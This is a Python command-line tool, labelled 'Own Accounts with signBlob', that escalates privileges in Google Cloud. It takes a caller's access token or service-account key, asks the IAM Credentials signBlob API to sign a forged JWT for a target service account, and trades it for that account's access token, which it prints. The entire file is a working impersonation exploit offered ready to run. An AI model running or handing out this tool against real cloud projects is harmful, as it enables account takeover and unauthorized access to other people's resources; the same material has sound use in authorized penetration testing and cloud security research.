#!/usr/bin/env python3 import base64 import json import argparse import requests import sys from datetime import datetime, timedelta from google.oauth2 import service_account import google.auth.transport.requests def b64Encode(data: bytes): return base64.urlsafe_b64encode(data).decode('utf-8') def createJwt(service_account_email): now = int(datetime.now().timestamp()) header = {"alg": "RS256", "typ": "JWT"} payload = { "iss": service_account_email, "sub": service_account_email, "scope": "https://www.googleapis.com/auth/cloud-platform", "aud": "https://oauth2.googleapis.com/token", "exp": now + 3600, "iat": now } header_b64 = b64Encode(json.dumps(header).encode()) payload_b64 = b64Encode(json.dumps(payload).encode()) return f"{header_b64}.{payload_b64}" def getTokenFromKeyFile(keyfile_path): scopes = ['https://www.googleapis.com/auth/cloud-platform'] creds = service_account.Credentials.from_service_account_file(keyfile_path, scopes=scopes) auth_req = google.auth.transport.requests.Request() creds.refresh(auth_req) return creds.token def executeSignBlob(bearer_token, target_sa): unsigned_jwt = createJwt(target_sa) sign_url = f"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/{target_sa}:signBlob" headers = { "Authorization": f"Bearer {bearer_token}", "Content-Type": "application/json" } data = {"payload": b64Encode(unsigned_jwt.encode())} resp = requests.post(sign_url, json=data, headers=headers) if resp.status_code != 200: print(f"[!] signBlob failed (Status {resp.status_code}): {resp.text}") return signature = resp.json()['signedBlob'] print(f"[*] Getting Access Token") assertion = f"{unsigned_jwt}.{signature}" token_url = "https://oauth2.googleapis.com/token" token_data = { "grant_type": "urn:ietf:params:oauth:grant-type:jwt-bearer", "assertion": assertion } token_resp = requests.post(token_url, data=token_data) return token_resp.json() def main(): parser = argparse.ArgumentParser(description="Own Accounts with signBlob") group = parser.add_mutually_exclusive_group(required=True) group.add_argument("-t", "--token", help="Caller's Access Token string") group.add_argument("-f", "--token-file", help="Path to file containing Access Token") group.add_argument("-k", "--key-file", help="Path to Service Account JSON key file") parser.add_argument("-s", "--target-account", required=True, help="Target Service Account Email") args = parser.parse_args() caller_token = None if args.token: caller_token = args.token elif args.token_file: with open(args.token_file, 'r') as f: caller_token = f.read().strip() elif args.key_file: caller_token = getTokenFromKeyFile(args.key_file) if not caller_token: print("[!] Could not retrieve a valid caller token.") sys.exit(1) result = executeSignBlob(caller_token, args.target_account) if result: print(f"[*] Successfully retrieved Access Token for {args.target_account}") print(json.dumps(result, indent=2)) if __name__ == "__main__": main()